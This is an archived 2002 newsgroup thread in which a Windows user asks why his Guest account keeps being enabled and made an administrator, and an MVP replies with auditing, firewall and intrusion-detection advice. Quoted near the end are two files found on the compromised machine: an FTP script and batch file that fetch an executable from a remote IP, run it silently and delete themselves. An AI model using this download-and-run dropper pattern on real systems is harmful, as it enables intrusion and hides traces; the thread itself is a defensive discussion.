Re: Is it really true that NTFS is secure?
From: George Hester (hesterloli@hotmail.com)
Date: 12/13/02
- Next message: Michel Gallant (MVP): "Re: on-line Messenger Service exploitation in Windows XP"
- Previous message: Michel Gallant (MVP): "Re: java vm current fix"
- In reply to: Karl Levinson [x y] mvp: "Re: Is it really true that NTFS is secure?"
- Next in thread: George Hester: "Re: Is it really true that NTFS is secure?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: "George Hester" <hesterloli@hotmail.com> Date: Fri, 13 Dec 2002 14:05:53 -0500
I already have been doing a lot of what you suggest. I will be looking into the rest. It looks like I have been able to get the Guest Group from appearing in the Administtrators group. I had a Malware BKDR_TASKReg.A when I went to http://www.antivirus.com and the Leroux virsu (which is not responsible for this issue) .
But the Guest accounrt is still enabling. Logs show nothing.
-- George Hester __________________________________ "Karl Levinson [x y] mvp" <levinson_k@excite.com> wrote in message news:#c7LZ5soCHA.2384@TK2MSFTNGP11... > You can enable auditing to watch for things like this: > > http://securityadmin.info/faq.htm#auditing > > Checking your IIS web logs is another common place to check. Look for > anything that mentions .EXE or % and that also has a code 200 or 502 in that > line. URLScan is a free IIS tool that comes with IISLockdown from > www.microsoft.com/technet/security that will block all this stuff, if that's > what this is. Most firewalls won't detect or block this stuff. > > Be sure you have a firewall, as this will log all traffic to and from your > server. The firewall should also block NetBIOS traffic on TCP and UDP ports > 135-139 and 445 from the internet, as this is another way people could be > accessing your guest account. > > Intrusion detection such as Black Ice or Snort [free] might be worth a try, > though getting Snort to alert just on interesting events on a Windows server > takes some knowledge. > > The free file change checker from www.gfi.com can also help you monitor your > system for intrusions not caught by antivirus, trojan scanners or firewalls. > > Other things to do to look for the source of the hacking and secure your > servers and computers are listed at: > > http://securityadmin.info/faq.htm#hacked [first] > http://securityadmin.info/faq.htm#harden [second] > > > "George Hester" <hesterloli@hotmail.com> wrote in message > news:ufXDRfmoCHA.2424@TK2MSFTNGP12... > Please understand that my machine comes up empty handed on all AV scans and > trojans. I need to find some way of watching when this Group Policy change > happens. Like a log. That tells me the time that it happend or the > responsible party. It doesn't show in Event Viewer. > > You know I ran a server W2K prior to this and never had this issue. Started > on Prof full time now and I am battling security it seems every hour. > > -- > George Hester > __________________________________ > "George Hester" <hesterloli@hotmail.com> wrote in message > news:OwrkSZmoCHA.2424@TK2MSFTNGP12... > Yes you may be able to help me with something. My Guerst user keeps getting > enabled and put in the Administrator group. How? > > -- > George Hester > __________________________________ > "Karl Levinson [x y] mvp" <levinson_k@excite.com> wrote in message > news:eleuHGkoCHA.1628@TK2MSFTNGP12... > > Do you have a problem we could help you with? Are there more details? > > > > What does this code have to do with NTFS? I'm sorry if your machine was > > exploited, though I'm not sure this has to do with NTFS. > > > > NTFS file permissions are plenty secure against remote exploits. If you > > have other security vulnerabilities that permit running commands as an > > account that has permissions in the NTFS ACLs, that's not exactly an NTFS > > failing. > > > > Windows 2000 configured correctly is as secure as most other operating > > systems configured correctly. Windows 2000 in the default install is > about > > as un-secure as Linux in the default install, especially if you go back to > > Linux from the year 2000. Securing Windows 2000 is about as complex and > > time consuming as securing Linux, maybe even easier. > > > > More information on ways to determine how you were hacked and how to > secure > > your computer: > > > > http://securityadmin.info/faq.htm#hacked > > http://securityadmin.info/faq.htm#re-secure > > http://securityadmin.info/faq.htm#harden > > > > > > "George Hester" <hesterloli@hotmail.com> wrote in message > > news:uB7a4afoCHA.2220@TK2MSFTNGP09... > > '--------- File: s.t sitting in %SystemRoot%\system32 -> > > open #my.ip.address# 'chnaged ip for privacy > > binary > > recv sui.exe .\sui.exe > > quit > > /-------- End of s.t > > > > REM File r.bat sitting in %SystemRoot%\system32 --> > > ftp -vnAs:s.t > > del s.t > > sui.exe -s678p345 -o > > call g.bat > > del r.bat > > REM End of r.bat -------- > > > > > > > > > >
- Next message: Michel Gallant (MVP): "Re: on-line Messenger Service exploitation in Windows XP"
- Previous message: Michel Gallant (MVP): "Re: java vm current fix"
- In reply to: Karl Levinson [x y] mvp: "Re: Is it really true that NTFS is secure?"
- Next in thread: George Hester: "Re: Is it really true that NTFS is secure?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
